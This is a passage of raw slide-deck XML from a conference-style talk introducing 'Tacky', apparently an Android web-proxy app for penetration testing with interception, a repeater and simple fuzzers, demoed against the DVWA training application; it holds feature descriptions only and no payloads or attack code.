                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>QUICKLIST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Shape 373"/>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274320" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2400" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Short quicklist that makes modifying requests a breeze</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="27432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We all hate typing inside an mobile device</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Shape 378"/>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Interceptor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="379" name="Shape 379"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="564100" x="587112"/>
            <a:ext cy="4483000" cx="7969774"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Shape 384"/>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Interceptor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="385" name="Shape 385"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="649800" x="716000"/>
            <a:ext cy="4338000" cx="7712000"/>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9" name="Shape 389"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Shape 390"/>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Repeater</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Shape 391"/>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When you wanna play around with a request, you can send the request to the repeater tab</a:t>
            </a:r>
          </a:p>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Request modification</a:t>
            </a:r>
          </a:p>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Response examination</a:t>
            </a:r>
          </a:p>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Response could also be displayed in webview</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sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Shape 117"/>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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="5400" lang="en-US" i="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>CHRIS / K</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>URISU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Shape 118"/>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Chris Liu</a:t>
            </a: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Claims to be a security engineer at Rakuten, Inc.</a:t>
            </a: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Only choose to live in Tokyo so he could go to 秋葉原  every night</a:t>
            </a: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Do a little penetration testing when he’s bored at work, for the rest of the time he just browses ptt.cc</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5" name="Shape 395"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Shape 396"/>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Repeater</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="397" name="Shape 397"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="676025" x="5017062"/>
            <a:ext cy="4493724" cx="2808576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="398" name="Shape 398"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="676025" x="1373425"/>
            <a:ext cy="4493721" cx="2808576"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="Shape 403"/>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Repeater</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Shape 404"/>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0" marL="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="405" name="Shape 405"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="518025" x="3128575"/>
            <a:ext cy="4497023" cx="2810650"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Shape 410"/>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Dumb fuzzer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Shape 411"/>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Garbage in, garbage out</a:t>
            </a:r>
          </a:p>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you can choose your favorite payload from fuzzdb</a:t>
            </a:r>
          </a:p>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And basically determine if any vuln exists by yourself</a:t>
            </a:r>
          </a:p>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Raw responses, and also can be shown in repeaters webview</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="Shape 416"/>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Dumb fuzzer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Shape 417"/>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0" marL="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="418" name="Shape 418"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="762000"/>
            <a:ext cy="4585650" cx="7337049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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2" name="Shape 422"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="Shape 423"/>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Dumb fuzzer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Shape 424"/>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0" marL="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="425" name="Shape 425"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="613300" x="657525"/>
            <a:ext cy="4360924" cx="7752749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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9" name="Shape 429"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Shape 430"/>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Dumb fuzzer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Shape 431"/>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0" marL="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="432" name="Shape 432"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="932184"/>
            <a:ext cy="4502149" cx="7203439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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6" name="Shape 436"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="Shape 437"/>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Automatic fuzzer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="Shape 438"/>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Currently under development but still be pushed out pretty soon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="274320">
              <a:spcBef>
                <a:spcPts val="48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Automatic garbage in, automatic garbage out</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2" name="Shape 442"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Shape 443"/>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D</a:t>
            </a:r>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="5400" lang="en-US" i="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>emo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Shape 444"/>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Get a feel of the overlayed magic</a:t>
            </a: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Attack DVWA (Damn Vulnerable Web Application) from the browser</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Interception</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History list</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Repeater</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Simple fuzzers (the beta of all the betas)</a:t>
            </a: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Time for Helpless hero</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8" name="Shape 448"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="Shape 449"/>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Problems we faced</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Shape 450"/>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ctr" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="20000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JAVA!</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4" name="Shape 454"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Shape 455"/>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Conclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="Shape 456"/>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Aside from the obvious proxy functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Translucent interface that acts as if it is a native debug functionality for the target app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Removal of the desktop in the middle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Penetration testing from a phone, on a bus, or while playing games</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Hopefully more discussions on mobile platform tools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4850" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Impact"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="4850" lang="en-US" i="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>WHO THE </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4850" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>HELL?!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Shape 124"/>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You may not know me</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0" name="Shape 460"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="Shape 461"/>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Free giveaways</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Shape 462"/>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274320" marL="27432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Built-in hand warmer &lt;3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="27432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And a good way to drain your battery too !!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="27432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Web application auditing via the built-in browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="27432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Lots of hidden bugs</a:t>
            </a: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lv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lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="463" name="Shape 463"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="2363050" x="2381250"/>
            <a:ext cy="2933700" cx="4381500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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7" name="Shape 467"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="Shape 468"/>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FUTURE WORK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="Shape 469"/>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Add more fuzzing capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="9144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Add Smarter fuzzer</a:t>
            </a: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Improved UI</a:t>
            </a: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Web spider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>iOS version of the app is on it’s way...maybe...</a:t>
            </a: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and more … maybe ...</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3" name="Shape 473"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Shape 474"/>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GOOD NEWS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Shape 475"/>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Tacky is free ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="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We accept all donations for beer</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9" name="Shape 479"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Shape 480"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4572000" x="762000"/>
            <a:ext cy="1600199" cx="6781800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="b" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Impact"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5400" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>Bad news</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Shape 481"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="762000"/>
            <a:ext cy="3886200" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
